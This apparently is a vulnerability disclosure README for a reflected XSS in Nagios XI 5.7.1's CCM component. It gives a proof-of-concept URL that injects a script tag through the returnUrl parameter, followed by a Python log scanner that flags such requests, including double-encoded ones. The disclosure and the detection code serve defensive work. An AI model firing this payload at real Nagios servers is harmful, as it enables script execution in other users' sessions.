
EmreOvunc/Nagios-XI-Reflected-XSS


Nagios-XI-Reflected-XSS

A reflected cross-site scripting (XSS) vulnerability in Nagios XI 5.7.1 can allow an attacker to perform malicious actions against users who open a maliciously crafted link or third-party web page.

PoC

To exploit the vulnerability, someone could send a GET request to 'http://[server]/includes/components/ccm/' and manipulate the 'returnUrl' query parameter to impact users who open a maliciously crafted link or third-party web page.

http://[server]/includes/components/ccm/?cmd=modify&id=1&page=1&returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&type=host
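For reviewing web-server access logs for requests of this shape, the following is an added example and not part of the original repository. It assumes a combined-format access log and that a legitimate `returnUrl` is a same-site relative URL; the allowlist, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

CCM_PATH = "/includes/components/ccm/"  # endpoint named in the PoC
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate returnUrl is a same-site relative URL, so it has
# no scheme, no leading "//" and no quote or angle-bracket characters.
SAFE_RETURN_URL = re.compile(r"(?!//)[A-Za-z0-9_\-./?=&%]*")

def fully_decode(value):
    """Percent-decode until stable so double-encoded markup is not missed."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def is_safe_return_url(value):
    """Allowlist check on the fully decoded value."""
    return SAFE_RETURN_URL.fullmatch(fully_decode(value)) is not None

def suspicious_requests(log_lines):
    """Return (line number, decoded returnUrl) for CCM requests failing the allowlist."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if CCM_PATH not in target.path:
            continue
        query = parse_qs(target.query, keep_blank_values=True)
        for value in query.get("returnUrl", []):
            if not is_safe_return_url(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed access-log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /includes/components/ccm/'
    '?cmd=modify&id=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dhost HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2021:10:00:05 +0000] "GET /includes/components/ccm/'
    '?cmd=modify&id=1&page=1&returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)'
    '%3C/script%3E&type=host HTTP/1.1" 200 5120',
    '192.0.2.12 - - [01/Jan/2021:10:00:09 +0000] "GET /includes/components/ccm/'
    '?cmd=modify&id=1&returnUrl=%2522%253C/script%253E&type=host HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: returnUrl={value!r}")
```

The third sample line is double-encoded: after the single decoding pass done by `parse_qs` it would still pass the allowlist, which is why the check runs on the fully decoded value.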
